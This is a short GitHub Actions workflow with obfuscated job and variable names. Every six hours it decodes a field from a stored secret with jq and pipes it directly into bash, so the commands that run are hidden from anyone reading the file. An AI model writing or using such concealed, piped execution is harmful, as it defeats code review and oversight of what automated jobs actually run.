name: jinzhishouk

on:
  workflow_dispatch:
  schedule:
    - cron: '12 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jinzhishouk
        env:
          wp20783: ${{ secrets.wp20783 }}
        run: |
          echo $wp20783 | jq -r .n02 | /bin/bash
          echo $vlsuc8 | jq -r .apaxv0 | /bin/bash
          echo $hdhw45 | jq -r .cy08 | /bin/bash
          echo $d3 | jq -r .eim62910 | /bin/bash
          echo $engk3867 | jq -r .tfqof750 | /bin/bash
          echo $ap2 | jq -r .ay17 | /bin/bash
          echo $pxce213 | jq -r .utqr93 | /bin/bash

